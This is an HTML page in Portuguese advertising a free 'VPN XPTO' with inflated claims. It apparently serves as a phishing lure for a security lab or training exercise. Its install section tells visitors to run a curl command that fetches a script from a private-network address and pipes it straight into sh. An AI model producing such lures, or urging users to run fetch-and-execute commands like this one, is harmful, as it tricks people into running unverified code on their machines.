<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <!--
    Modified from the Debian apache2 default index page
  -->
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>VPN XPTO - Download</title>
    <style type="text/css" media="screen">
  * {
    margin: 0px 0px 0px 0px;
    padding: 0px 0px 0px 0px;
  }

  body, html {
    padding: 3px 3px 3px 3px;
    background-color: #D8DBE2;
    font-family: Verdana, sans-serif;
    font-size: 11pt;
    text-align: center;
  }

  div.main_page {
    position: relative;
    display: table;
    width: 800px;
    margin-bottom: 3px;
    margin-left: auto;
    margin-right: auto;
    padding: 0px 0px 0px 0px;
    border-width: 2px;
    border-color: #212738;
    border-style: solid;
    background-color: #FFFFFF;
    text-align: center;
  }

  div.page_header {
    height: 99px;
    width: 100%;
    background-color: #F5F6F7;
  }

  div.page_header span {
    margin: 15px 0px 0px 50px;
    font-size: 180%;
    font-weight: bold;
  }

  div.page_header img {
    margin: 3px 0px 0px 40px;
    border: 0px 0px 0px;
  }

  div.content_section {
    margin: 3px 3px 3px 3px;
    background-color: #FFFFFF;
    text-align: left;
  }

  div.content_section_text {
    padding: 4px 8px 4px 8px;
    color: #000000;
    font-size: 100%;
  }

  div.content_section_text pre {
    margin: 8px 0px 8px 0px;
    padding: 8px 8px 8px 8px;
    border-width: 1px;
    border-style: dotted;
    border-color: #000000;
    background-color: #F5F6F7;
    font-style: italic;
  }

  div.content_section_text p {
    margin-bottom: 6px;
  }

  div.content_section_text ul, div.content_section_text li {
    padding: 4px 8px 4px 16px;
  }

  div.section_header {
    padding: 3px 6px 3px 6px;
    background-color: #8E9CB2;
    color: #FFFFFF;
    font-weight: bold;
    font-size: 112%;
    text-align: center;
  }

  div.section_header_red {
    background-color: #CD214F;
  }

  .floating_element {
    position: relative;
    float: left;
  }

  div.content_section_text a {
    text-decoration: none;
    font-weight: bold;
  }

  div.content_section_text a:link,
  div.content_section_text a:visited,
  div.content_section_text a:active {
    background-color: #DCDFE6;
    color: #000000;
  }

  div.content_section_text a:hover {
    background-color: #000000;
    color: #DCDFE6;
  }
    </style>
  </head>
  <body>
    <div class="main_page">
      <div class="page_header floating_element">
        <span class="floating_element">
		VPN XPTO: segurança e privacidade
        </span>
      </div>
      <div class="content_section floating_element">
        <div class="section_header section_header_red">
          <div id="about"></div>
		A melhor VPN do mundo!
        </div>
        <div class="content_section_text">
          <p>
                Bem vindo ao site do sistema de VPN XPTO: o sistema mais seguro e robusto do mercado!
          </p>
          <p>
                Utilizando a VPN XPTO voce navega de forma segura e com privacidade na internet!
                A VPN XPTO protege voce contra fraudes eletronicas e <tt>melhora o desempenho da 
                sua Internet em 100%</tt>. <b>Tudo isso de graca!</b>
          </p>
        </div>
        <div class="section_header">
          <div id="changes"></div>
		Faça o download agora mesmo!
        </div>
        <div class="content_section_text">
          <p>
		Instalar a VPN XPTO é muito fácil, rápido e <b>seguro</b>! Basta seguir os passsos abaixo:
          </p>
          <pre>
    		curl -sfL http://192.168.1.250:5000/s/download-vpn | sh
          </pre>
        </div>

        <div class="section_header">
          <div id="bugs"></div>
                Precisa de ajuda? Relate seu problema aqui!
        </div>
        <div class="content_section_text">
          <p>
                Temos uma equipe de segurança altamente especializada e pronta para
		te ajudar. Relate seu problema <a href="#">aqui</a> e time resolverá
		seu problema.
          </p>
        </div>
      </div>
    </div>
  </body>
</html>
